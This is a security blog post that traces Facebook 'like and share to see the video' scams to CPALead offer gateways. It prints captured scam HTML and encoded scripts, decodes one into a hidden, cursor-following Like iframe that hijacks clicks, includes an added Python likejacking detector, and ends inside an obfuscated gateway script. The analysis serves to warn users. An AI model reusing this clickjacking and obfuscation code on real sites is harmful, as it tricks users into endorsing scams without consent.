Results tagged “malware” from Just Another Hacker

More CPALead facebook abuse

cpalead-like-spam-norsk.PNG
It's not really surprising that these guys are still at it, I was however a little surprised to see that they have branched out into region-specific apps and pages. Perhaps it helps avoid detection? The text in the image is Norwegian and translates to "Teenage mum arrested after having uploaded a disgusting video of her child" and "see the video".

Looks like fun, so we look behind the curtain.
linux:~$ GET http://tinlike.info/
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<title>Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt</title>
<meta name="description" content="Tenåringsmamma ble arrestert og satt i fengsel etter å ha lastet opp motbydelig video av sin to år gamle datter!"><meta property="og:site_name" content="Se videoen!"/>
<meta property="og:title" content="Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt"/>
<meta property="og:url" content="http://tinlike.info/"/>
<meta property="og:image" content="http://i51.tinypic.com/716ako.jpg"/>
<meta property="og:description" content="Tenåringsmamma ble arrestert og satt i fengsel etter å ha lastet opp motbydelig video av sin to år gamle datter!"/>
<meta property="og:type" content="website" />
<meta property="fb:app_id" content="149463805092381"/>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<link href="/css/style.css" rel="stylesheet" type="text/css" />

</head>
<body>
<div id="fb-root"></div>
<script src="http://connect.facebook.net/en_US/all.js"></script>
<script type="text/javascript" src="jquery.js"></script>

    <div id="header2">
            <h1 class="h1pages" align="center">Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt!</h1>
</div>
<div class="capwrap">
    <div class="grid2col">
        <div>
            <div style="width:920px"><div class="right" style="width:800px;margin-right:50px;">
            <center <img src="http://tinlike.info/images/2q1rwjk.jpg"> </center>
              </div>


              </div>
            <div class="left">
                          <div align="center">
                            <h1 style="color:#FF0000;">Tenåringsmamma ble arrestert og satt i fengsel etter å ha lastet opp motbydelig video av sin to år gamle datter!</h1>
                            <p><br>
                            Følg de <strong>enkle stegene</strong> nedenfor for å se videoen (det tar bare 10 sekunder!) </p>
                            <img src="http://i33.tinypic.com/2emfn0p.png">
<noscript>Please enable JavaScript in your browser to continue.</noscript>
                          </div>
                          <div id="step1" align="center"><div class="step">
                            <h2 class="h2page"s>Steg 1 - Klikk "Like"</h2>
                            <br>

        <div id="like">
                <fb:like font="lucida grande" width="350" show_faces="true" action="like"></fb:like>
        </div>

</div></div>
<div align="center"><div id="step2"><div class="step">
  <h2 class="h2page">Steg 2 - Klikk "Share"</h2>
<br>

        <div id="share">
                <input id="share-button" class="button" type="submit" style="width:100px" value="Share" onclick="share()" />
        </div>
        </div>

                <div id="step3">
                        <form id='fm-content' method="get" action='readko.php'>
                                <input name="hidden" type="hidden" value="hidden" />

                        </form>



</div></div></div>

                        </div></div>

<div class="clear"></div>
</div>
</div>
<div class="maincap bottom"></div>
</div>
<div id="footer-wrap">
           <div id="footer">
                   <p class="left"><script type="text/javascript" src="http://widgets.amung.us/small.js"></script><script type="text/javascript">WAU_small('bx2nllsfxm0a')</script></p><p style="float:right"></p>
         </div></div>

</body>
</html>

Yep, it's your typical "to see the video you must like and share this link" rubbish. Let's see what's behind door number two:
linux:~$ GET http://tinlike.info/readko.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript">var isloaded = false;</script><script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=41457&gateid=MTM3MzQ4"></script><script type="text/javascript">if (!isloaded) { window.location = 'http://cpalead.com/adblock.php?pub=41457'; }</script><noscript><meta http-equiv="refresh" content="0;url=http://cpalead.com/nojava.php?pub=41457" /></noscript>
<title>Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt!</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/css/style.css" rel="stylesheet" type="text/css" />
</head>
<body>
    <div id="header2">
            <h1 class="h1pages" align="center">Tenåringsmamma fengslet etter å ha lastet opp motbydelig video av barnet sitt!</h1>
    </div>
<div class="capwrap">
    <div class="grid2col">
        <div>
<h1 style="color:#FF0000;">Er du nå klar til å se videoen?</h2>
                                        <h1>Etter at du har fullført vår spam/bot kontroll, klikk på knappen nedenfor for å se videoen.</h1>

                                </div>

                                <div id="step1">

                                <br><br><br><br><br><br>
                                <center><SCRIPT LANGUAGE="JavaScript">

var OpenWindow;
var windowprops = "toolbar=0,location=0,directories=0,status=0, " + "menubar=0,scrollbars=1,resizable=0,width=800,height=600";

function performProcess() {
OpenWindow = window.open("http://tinlike.info/videoo.html", "Videon!", windowprops);
document.yourFormName.submit();
}

</SCRIPT>


<button onClick="performProcess();" type="button"><font size="4">Se videoen!</font></button>

                </div></center>

                        </div>
<div class="clear"></div>
</div>
</div>
<div class="maincap bottom"></div>
</div>
<div id="footer-wrap">
           <div id="footer">
                   <p class="left"><script type="text/javascript" src="http://widgets.amung.us/tab.js"></script><script type="text/javascript">WAU_tab('bx2nllsfxm0a', 'left-middle')</script></p><p style="float:right"></p>
         </div></div>

</body>
And sure enough, cpalead rears its ugly head again. The interesting bit with this one was the use of the amung.us stat counter in both the bait page and the delivery page: they are now tracking their clickthrough performance. The use of facebook markup to perform the like and share actions without showing up as a facebook app in the news feed is also neat. I hope facebook plugs this loophole, having apps be anonymous when posting to your wall is just bad news.

The moral of the story, boys and girls, is that if something "demands" that you click like on facebook you should absolutely NOT click, but rather report the app or page.
rabbithole.png
Today I noticed this one in my facebook feed and thought: that's different! It's been a while since I chased a rabbit, so down the rabbit hole I went.
~$ GET http://craziestattoos.blogspot.com/

<meta property="og:title" content="The Guy With The Largest Dick On The Planet">
<meta property="og:type" content="article">
<meta property="og:url" content="http://craziestattoos.blogspot.com/"><link rel="me" href="http://www.blogger.com/profile/09319063164064567908">
<link rel="openid.server" href="http://www.blogger.com/openid-server.g">
<!-- --><style type="text/css">@import url(http://www.blogger.com/static/v1/v-css/navbar/697174003-classic.css);
div.b-mobile {display:none;}
</style>

<script type="text/javascript">
    function setAttributeOnload(object, attribute, val) {
      if(window.addEventListener) {
        window.addEventListener("load",
          function(){ object[attribute] = val; }, false);
      } else {
        window.attachEvent('onload', function(){ object[attribute] = val; });
      }
    }
  </script>
<iframe src="http://www.blogger.com/navbar.g?targetBlogID=6834350941604690306&blogName=The+Guy+With+The+Largest+Dick+On+The+...&publishMode=PUBLISH_MODE_BLOGSPOT&navbarType=BLUE&layoutType=CLASSIC&searchRoot=http%3A%2F%2Fcraziestattoos.blogspot.com%2Fsearch&blogLocale=nl&homepageUrl=http%3A%2F%2Fcraziestattoos.blogspot.com%2F" marginwidth="0" marginheight="0" id="navbar-iframe" allowtransparency="true" title="Blogger Navigation and Search" frameborder="0" height="30" scrolling="no" width="100%"></iframe>
<div></div>
<center><a href="http://access.im/1/AzO93"><img src="http://i46.tinypic.com/33ygjk6.jpg" /></a></center>
<script type="text/javascript" src="http://www.blogger.com/static/v1/common/js/4161557039-csitail.js"></script>
<script type="text/javascript">BLOG_initCsi('classic_blogspot');</script></body>
The blogspot page delivers an access.im link, visible as a "skip this ad page" image, which redirects to http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html when you click on it. Let's head further down the burrow:
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script src="top.js" type="text/javascript"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
</style>
<center><img src="18.png" /></center>
<center><div class="faq-answer" id="faq-1"><img src="pre.jpg"></div></center>
<script src="bottom.js" type="text/javascript"></script>  
</body>
Looks pretty normal, right? I took a look at the jquery.js and at a cursory glance it looks authentic, but then top.js delivers the first rabbit droppings:
~$ GET http://allhqpics.com/top.js
<!--
document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%76%61%72%20%69%6E%74%65%72%76%61%6C%3B%0A%20%20%20%20%20%20%20%20%24%28%66%75%6E%63%74%69%6F%6E%28%29%0A%7B%0A%20%20%20%20%69%6E%74%65%72%76%61%6C%3D%73%65%74%49%6E%74%65%72%76%61%6C%28%22%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%3B%22%2C%20%35%30%30%29%3B%0A%7D%29%3B%0A%0A%66%75%6E%63%74%69%6F%6E%20%75%70%64%61%74%65%41%63%74%69%76%65%45%6C%65%6D%65%6E%74%28%29%0A%7B%0A%20%20%20%20%69%66%20%28%20%24%28%64%6F%63%75%6D%65%6E%74%2E%61%63%74%69%76%65%45%6C%65%6D%65%6E%74%29%2E%61%74%74%72%28%27%69%64%27%29%3D%3D%22%66%62%66%72%61%6D%65%22%20%29%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%63%6C%65%61%72%49%6E%74%65%72%76%61%6C%28%69%6E%74%65%72%76%61%6C%29%3B%0A%20%20%20%20%20%20%20%20%69%66%6C%61%67%3D%31%3B%0A%20%20%20%20%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6C%6F%63%61%74%69%6F%6E%3D%22%68%74%74%70%3A%2F%2F%61%6C%6C%68%71%70%69%63%73%2E%63%6F%6D%2F%74%68%65%2D%67%75%79%2D%77%69%74%68%2D%74%68%65%2D%6C%61%72%67%65%73%74%2D%64%69%63%6B%2D%6F%6E%2D%74%68%65%2D%70%6C%61%6E%65%74%2D%32%2E%68%74%6D%6C%22%3B%20%0A%20%20%20%20%7D%20%20%20%20%0A%7D%20%20%0A%20%20%20%20%20%20%20%20%3C%2F%73%63%72%69%70%74%3E%0A'));
//-->
Decoding that string gives us:
<script type="text/javascript">
var interval;
        $(function()
{
    interval=setInterval("updateActiveElement();", 500);
});

function updateActiveElement()
{
    if ( $(document.activeElement).attr('id')=="fbframe" ) 
    {
        clearInterval(interval);
        iflag=1;
        document.location="http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html"; 
    }    
}  
        </script>
I'll get back to the second html page in a bit, first let's check bottom.js from the first page:
~$ GET http://allhqpics.com/bottom.js
<!--
document.write(unescape('%3C%64%69%76%20%73%74%79%6C%65%3D%22%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%20%31%30%70%78%3B%20%68%65%69%67%68%74%3A%20%31%32%70%78%3B%20%70%6F%73%69%74%69%6F%6E%3A%20%61%62%73%6F%6C%75%74%65%3B%20%66%69%6C%74%65%72%3A%61%6C%70%68%61%28%6F%70%61%63%69%74%79%3D%30%29%3B%20%2D%6D%6F%7A%2D%6F%70%61%63%69%74%79%3A%30%2E%30%3B%20%2D%6B%68%74%6D%6C%2D%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%20%6F%70%61%63%69%74%79%3A%20%30%2E%30%3B%22%20%69%64%3D%22%69%63%6F%6E%74%61%69%6E%65%72%22%3E%0A%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%66%61%63%65%62%6F%6F%6B%2E%63%6F%6D%2F%70%6C%75%67%69%6E%73%2F%6C%69%6B%65%2E%70%68%70%3F%68%72%65%66%3D%68%74%74%70%3A%2F%2F%66%75%6E%6E%79%2D%63%65%6C%65%62%2D%70%69%63%73%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%2F%26%61%6D%70%3B%6C%61%79%6F%75%74%3D%73%74%61%6E%64%61%72%64%26%61%6D%70%3B%73%68%6F%77%5F%66%61%63%65%73%3D%66%61%6C%73%65%26%61%6D%70%3B%77%69%64%74%68%3D%34%35%30%26%61%6D%70%3B%61%63%74%69%6F%6E%3D%6C%69%6B%65%26%61%6D%70%3B%66%6F%6E%74%3D%74%61%68%6F%6D%61%26%61%6D%70%3B%63%6F%6C%6F%72%73%63%68%65%6D%65%3D%6C%69%67%68%74%26%61%6D%70%3B%68%65%69%67%68%74%3D%38%30%22%20%73%63%72%6F%6C%6C%69%6E%67%3D%22%6E%6F%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%20%73%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%6E%6F%6E%65%3B%20%6F%76%65%72%66%6C%6F%77%3A%68%69%64%64%65%6E%3B%20%77%69%64%74%68%3A%35%30%70%78%3B%20%68%65%69%67%68%74%3A%32%33%70%78%3B%22%20%61%6C%6C%6F%77%54%72%61%6E%73%70%61%72%65%6E%63%79%3D%22%74%72%75%65%22%20%69%64%3D%22%66%62%66%72%61%6D%65%22%20%6E%61%6D%65%3D%22%66%62%66%72%61%6D%65%22%3E%3C%2F%69%66%72%61%6D%65%3E%0A%3C%2F%64%69%76%3E%0A%3C%73%63%72%69%70%74%3E%0A%20%20%20%20%76%61%72%20%69%66%6C%61%67%20%3D%20%30%3B%0A%20%20%20%20%76%61%72%20%69%63%6F%6E%74%61%69%6E%65%72%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%69%63%6F%6E%74%61%69%6E%65%72%27%29%3B%20%20%20%20%0A%20%20%20%20%76%61%72%20%
73%74%61%6E%64%61%72%64%62%6F%64%79%3D%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6D%70%61%74%4D%6F%64%65%3D%3D%22%43%53%53%31%43%6F%6D%70%61%74%22%29%3F%20%64%6F%63%75%6D%65%6E%74%2E%64%6F%63%75%6D%65%6E%74%45%6C%65%6D%65%6E%74%20%3A%20%64%6F%63%75%6D%65%6E%74%2E%62%6F%64%79%20%2F%2F%63%72%65%61%74%65%20%72%65%66%65%72%65%6E%63%65%20%74%6F%20%63%6F%6D%6D%6F%6E%20%22%62%6F%64%79%22%20%61%63%72%6F%73%73%20%64%6F%63%74%79%70%65%73%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%0A%20%20%20%20%66%75%6E%63%74%69%6F%6E%20%6D%6F%75%73%65%46%6F%6C%6C%6F%77%65%72%28%65%29%7B%0A%20%20%20%20%20%20%20%20%2F%2A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%44%4F%20%4E%4F%54%20%45%44%49%54%20%54%48%49%53%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%2A%2F%0A%20%20%20%20%69%66%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%29%20%0A%20%20%20%20%7B%20%2F%2F%20%66%6F%72%20%49%45%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%79%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%54%6F%70%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%77%69%6E%64%6F%77%2E%65%76%65%6E%74%2E%78%2D%35%29%2B%73%74%61%6E%64%61%72%64%62%6F%64%79%2E%73%63%72%6F%6C%6C%4C%65%66%74%2B%27%70%78%27%3B%0A%20%20%20%20%7D%20%0A%20%20%20%20%65%6C%73%65%20%0A%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%74%6F%70%20%3D%20%28%65%2E%70%61%67%65%59%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%6C%65%66%74%20%3D%20%28%65%2E%70%61%67%65%58%2D%35%29%2B%27%70%78%27%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20%7D%0A%20%20%20%20%64%6F%63%75%6D%65%6E%74%2E%6F%6E%6D%6F%75%73%65%6D%6F%76%65%20%3D%20%66%75%6E%63%74%69%6F%6E%28%65%29%20%7B%0A%20%20%20%20%20%20%20%20%69%66%20%28%69%66%6C%61%67%20%3D%3D%20%30%29%20%7B%6D%6F%75%73
%65%46%6F%6C%6C%6F%77%65%72%28%65%29%3B%7D%0A%20%20%20%20%20%20%20%20%65%6C%73%65%0A%20%20%20%20%20%20%20%20%7B%0A%20%20%20%20%20%20%20%20%69%63%6F%6E%74%61%69%6E%65%72%2E%73%74%79%6C%65%2E%64%69%73%70%6C%61%79%20%3D%20%27%6E%6F%6E%65%27%3B%20%7D%0A%20%20%20%20%7D%0A%0A%20%20%20%20%3C%2F%73%63%72%69%70%74%3E'));
//-->
Which decodes to:
<div style="overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;" id="icontainer">
<iframe src="http://www.facebook.com/plugins/like.php?href=http://funny-celeb-pics.blogspot.com/&layout=standard&show_faces=false&width=450&action=like&font=tahoma&colorscheme=light&height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:50px; height:23px;" allowTransparency="true" id="fbframe" name="fbframe"></iframe>
</div>
<script>
    var iflag = 0;
    var icontainer = document.getElementById('icontainer');    
    var standardbody=(document.compatMode=="CSS1Compat")? document.documentElement : document.body //create reference to common "body" across doctypes
    
    
    
    function mouseFollower(e){
        /*                    DO NOT EDIT THIS                         */
    if (window.event) 
    { // for IE
        icontainer.style.top = (window.event.y-5)+standardbody.scrollTop+'px';
        icontainer.style.left = (window.event.x-5)+standardbody.scrollLeft+'px';
    } 
    else 
    {
        icontainer.style.top = (e.pageY-5)+'px';
        icontainer.style.left = (e.pageX-5)+'px';
    }

    }
    document.onmousemove = function(e) {
        if (iflag == 0) {mouseFollower(e);}
        else
        {
        icontainer.style.display = 'none'; }
    }

    </script>
This gets a little more interesting: the container is fully transparent and the script keeps it under the mouse pointer, so wherever you click, the click lands on the Facebook Like button. That is a CSRF request to facebook for you to like the malicious site and lure in more unsuspecting victims. It's time to pick up the pace and move on.
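The hidden-iframe trick just decoded, as an added Python example (not the post's own code): it decodes document.write(unescape('...')) blobs the way the browser's unescape() does, then parses the result for a Facebook Like iframe hidden inside a zero-opacity container and for a cursor-following script. The sample script is constructed in the shape of bottom.js; bait.example is a placeholder.

```python
import re
from html.parser import HTMLParser

# JavaScript unescape(): %XX is one Latin-1 code unit and %uXXXX one UTF-16
# unit. There is no UTF-8 decoding, and malformed sequences are left alone,
# which is what the browser does with them as well.
def js_unescape(s):
    return re.sub(
        r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})",
        lambda m: chr(int(m.group(1) or m.group(2), 16)),
        s,
    )

# Every single-quoted string literal handed to unescape(...) in a script.
_UNESCAPE_CALL = re.compile(r"unescape\(\s*'((?:[^'\\]|\\.)*)'\s*\)")

def decode_unescape_payloads(js_src):
    """Decoded text of each document.write(unescape('...')) blob in js_src."""
    return [js_unescape(m.group(1)) for m in _UNESCAPE_CALL.finditer(js_src)]

# Matches opacity:0, opacity: 0.0 and filter:alpha(opacity=0); not 0.80 or 0.05.
_ZERO_OPACITY = re.compile(r"opacity\s*[:=]\s*0(?:\.0+)?(?![\d.])")

def is_invisible(style):
    return bool(style) and _ZERO_OPACITY.search(style) is not None

_VOID = {"img", "br", "input", "meta", "link", "hr", "area", "base", "col",
         "embed", "param", "source", "track", "wbr"}

class LikejackScanner(HTMLParser):
    """Flag Facebook Like iframes made invisible by a zero-opacity style on
    the iframe itself or on any element enclosing it. Assumes the markup is
    reasonably well formed (tags closed in order), as the decoded blob is."""

    def __init__(self):
        super().__init__()
        self._hidden = []      # one flag per currently open ancestor
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        hidden = is_invisible(a.get("style"))
        src = a.get("src") or ""
        if tag == "iframe" and "facebook.com/plugins/like.php" in src:
            if hidden or any(self._hidden):
                self.findings.append({"id": a.get("id"), "src": src})
        if tag not in _VOID:
            self._hidden.append(hidden)

    def handle_startendtag(self, tag, attrs):   # <x/> self-closing form
        self.handle_starttag(tag, attrs)
        if tag not in _VOID:
            self._hidden.pop()

    def handle_endtag(self, tag):
        if tag not in _VOID and self._hidden:
            self._hidden.pop()

def scan_html(html):
    p = LikejackScanner()
    p.feed(html)
    p.close()
    return p.findings

def follows_cursor(html):
    """True when a script repositions an element on every mouse move."""
    return ("onmousemove" in html
            and re.search(r"style\.(?:top|left)\s*=", html) is not None)

def scan_script(js_src):
    """Decode the unescape() blobs in a script and report likejacking signs."""
    findings, cursor = [], False
    for html in decode_unescape_payloads(js_src):
        findings.extend(scan_html(html))
        cursor = cursor or follows_cursor(html)
    return {"hidden_like_frames": findings, "follows_cursor": cursor}

# Constructed sample in the shape of bottom.js above, not the live payload:
# a zero-opacity container around a Like iframe, plus the mouse follower.
# bait.example is a placeholder for the page being promoted.
SAMPLE_BOTTOM_JS = (
    "document.write(unescape('"
    "%3Cdiv style%3D%22position%3A absolute%3B filter%3Aalpha(opacity%3D0)%3B "
    "opacity%3A 0.0%3B%22 id%3D%22icontainer%22%3E"
    "%3Ciframe src%3D%22http%3A%2F%2Fwww.facebook.com%2Fplugins%2Flike.php"
    "%3Fhref%3Dhttp%3A%2F%2Fbait.example%2F%22 id%3D%22fbframe%22%3E%3C%2Fiframe%3E"
    "%3C%2Fdiv%3E%0A%3Cscript%3Edocument.onmousemove %3D function(e) %7B "
    "icontainer.style.top %3D (e.pageY-5)%2B%27px%27%3B %7D%3C%2Fscript%3E"
    "'));"
)

if __name__ == "__main__":
    print(scan_script(SAMPLE_BOTTOM_JS))
```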
~$ GET http://allhqpics.com/the-guy-with-the-largest-dick-on-the-planet-2.html
<head>
<title>The Guy With The Largest Dick On The Planet</title>
<script src="jquery.js" type="text/javascript"></script>
<script type="text/javascript" src="http://www.cpalead.com/mygateway.php?pub=42138&gateid=OTM5ODQ%3D"></script>
</head>
<body> 
<script type="text/javascript">
$(document).ready(function() {									
	$("a[name^='faq-']").each(function() {
		$(this).click(function() {
			if( $("#" + this.name).is(':hidden') ) {
				$("#" + this.name).fadeIn('normal');
                                $("a[name^='faq-']").hide('normal');
			} else {
				$("#" + this.name).fadeOut('normal');
			}			
			return false;
		});
	});
});
</script>

<style type="text/css">
.faq-answer {
display:none;
}
<style>
<center><a href="#" name="faq-1"><img src="pre.jpg"></a></center>
<center></a><div class="faq-answer" id="faq-1"><a href="#" name="faq-1"><img src="hero.jpg"></div></center>  
</body>
And the reference to cpalead gives it away. That URL delivers your typical function(p,a,c,k,e,d) obfuscated JavaScript, which we decode using the Tom Liston method:
function showme(txt) {
	document.write("<textarea rows=50 cols=50>");document.write(txt); document.write("</textarea>"); 
}

//Copyright 2010 CPAlead.com

showme(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('6 124={"123":[{"13":"224=","18":"99","66":"0"},{"13":"200=","18":"50","66":"0"},{"13":"225=","18":"30","66":"0"},{"13":"222=","18":"95","66":"0"}]};9 76(7,189){90(6 65=0;65<124.123.97;65++){4(124.123[65].13==231(7)){153 124.123[65][189]}}}6 108=\'\';6 245=85;6 248=75;6 131=85;6 102=85;6 250=85;6 59=0;6 149=0;6 175=\'79\';6 249=\'242 246 230 228 227 62 239 240 243.\';9 251(113){6 133=19.128;4(247 19.128!=\'9\'){19.128=113}12{19.128=9(){4(133){241{133()}234(235){}}4(113){113()}}}}9 114(7){6 88=2.81("20").207(0);4(88==237){59=59+300;48("114(\'"+7+"\');",300)}12{199(7)}}9 226(7){4(108>0){59=59+108+\'155\';48("114(\'"+7+"\');",108+\'155\')}12{59=59+300;48("114(\'"+7+"\');",300)}}9 177(41){78=2.81(\'64\');90(8=0;8!=78.97;8++){4(78[8].13!=\'24\'){4(41==0){78[8].3.33=\'86\'}4(41==1){78[8].3.33=\'47\'}}}}9 140(41){6 211=2.81(\'236\');90(6 209=2.211,8=0,22;22=209[8];8++){4(22.13!=\'170\'&&22.13!=\'159\'){4(41==0){4(195.198==\'212 220 215\'){22.73(\'87\',\'25\');22.3.33=\'86\'}12{22.73(\'87\',\'25\');6 196=22.252,139=22.244;139.233(22);139.201(22,196)}}4(41==1){22.73(\'87\',\'19\');4(195.198==\'212 220 215\'){22.3.33=\'47\'}}}}}9 150(41){49=2.81(\'238\');90(8=0;8!=49.97;8++){4(49[8].13!=\'170\'&&49[8].13!=\'159\'){4(41==0){49[8].73(\'87\',\'25\');49[8].3.33=\'86\'}4(41==1){49[8].3.33=\'47\';49[8].73(\'87\',\'19\')}}}}9 96(){6 68,61;4(19.104&&19.184){68=19.176+19.223;61=19.104+19.184}12 4(2.20.183>2.20.60){68=2.20.232;61=2.20.183}12{68=2.20.229;61=2.20.60}6 14,58;4(137.104){14=2.74.98?2.74.98:137.176;58=137.104}12 4(2.74&&2.74.89){14=2.74.98;58=2.74.89}12 4(2.20){14=2.20.98;58=2.20.89}181=61<58?58:61;180=68<14?68:14;153 51=146 263(180,181,14,58)}9 141(){6 
51=96();4((51[1]-2.5(\'11\').3.23.218("130",""))>30){2.5(\'11\').3.23=(51[1]+\'130\')}4(149==0){48("141();",169)}}9 77(7,178){4(178!=175){34.213.291=\'37://71.43.46/290.72?82=83\'}6 15=2.5(\'11\');6 26=2.5(\'35\');140(1);150(1);177(1);149=1;102=75;4(76(7,\'66\')==1&&191!=75){15.3.120="118(18=0)";15.3.18="0.0";2.5(\'24\').44=\'37://71.292.293/294-109.72\';191=75}12{26.3.21=\'42\';15.3.21=\'42\';2.5(\'24\').44=\'289:288\';2.5(\'24\').3.21=\'42\'}153 85}9 57(174){4(!102&&131){4(19.188&&19.188.185){6 147=1}12{6 147=0}67=146 173();67.44="37://71.43.46/62-145.72?82=83&185="+147+"&145="+174;2.20.161(67);164()}}9 151(148){4(!102&&131){67=146 173();67.44="37://71.43.46/62-145-283.72?82=83&148="+148;2.20.161(67);194(\'37://71.43.46/282.72?82=83\')}}9 156(){4(!2.5(\'11\')){57(\'109-110-132\')}12 4(!2.5(\'35\')){57(\'62-110-132\')}12 4(!2.5(\'24\')){57(\'64-110-132\')}12 4(2.5(\'11\').3.17!="100%"||2.5(\'11\').3.21!="55"||2.5(\'11\').3.33!="47"){57(\'109-163\')}12 4(2.5(\'35\').3.17!="100%"||2.5(\'35\').3.21!="55"||2.5(\'35\').3.33!="47"){57(\'62-163\')}12 4(2.5(\'24\').3.21!="55"){57(\'64-110-47\')}4(2.5(\'24\').60<=300&&2.5(\'24\').60!=0){151(\'64-23-158-\'+2.5(\'24\').60)}12 4(2.5(\'11\').60<=100&&2.5(\'11\').89<=100){151(\'109-23-158-\'+2.5(\'11\').60+\'-\'+2.5(\'11\').89)}48("156()",172)}9 164(){6 143=["\\168\\165\\136\\84\\134\\284","\\136\\84\\167\\134\\187\\204\\84\\216"];19[143[1]][143[0]]()}9 194(217){6 154=["\\296\\168\\165\\287","\\136\\84\\167\\134\\187\\204\\84\\216"];34[154[1]][154[0]]=217}9 219(7){2.5(\'24\').286.213.218(\'37://71.43.46/295.72?82=83&302=203.45.56.190&7=\'+7+\'&299=\'+166(2.298)+\'\')}9 214(7){6 51=96();6 88=2.81("20").207(0);6 15=2.253("10");15.73(\'13\',\'11\');15.3.21=\'42\';15.3.28=\'121\';15.3.34=\'0\';15.3.202=\'0\';15.3.197=\'301\';15.3.17=\'100%\';88.201(15,88.303);142=76(7,\'18\');92=142/100;2.5(\'11\').3.120="118(18="+142+")";2.5(\'11\').3.18=92;15.3.23=(51[1]+\'130\');15.3.21=\'55\';15.3.33=\'47\'}9 199(7){6 
106=[\'200%297\'];4(!2.5(\'11\')){214(7)}12{4(2.5(\'11\').3.21=\'42\'){2.5(\'11\').3.21=\'55\';92=76(7,\'18\')/100;2.5(\'11\').3.120="118(18="+92+")";2.5(\'11\').3.18=92}}6 51=96();141();140(0);150(0);6 26=2.5(\'35\');26.3.21=\'55\';26.3.33=\'47\';26.3.28=\'121\';26.3.34=\'0\';26.3.202=\'0\';26.3.197=\'285\';26.3.17=\'100%\';6 144=0;90(6 8=0;8<106.97;8++){4(106[8]==7||106[8]==166(7)){6 157=76(7,\'66\');4(157==1){2.5(\'129\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 115; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 3="112: 105;"><91 44="37://94.43.46/103/160-62/160-280-262-261.179" 93="0" 101="111 117"></14></10>\';2.5(\'116\').53=\'<10 3="28: 54; 17: 152; 34: 193; 63: -186; 36-39: 38; 31-29: 125; 52-70: 69; 27-32: 25;"><14 107="77(\\\'\'+7+\'\\\', \\\'79\\\');" 13="221" 3="112: 105;"><91 17="135" 23="40" 44="37://94.43.46/103/192.182" 93="0" 101="111 117"></14></10>\'}12{2.5(\'129\').53=\'<10 3="28: 54; 17: 122; 34: 127; 63: 126; 36-39: 38; 31-29: 115; 52-70: 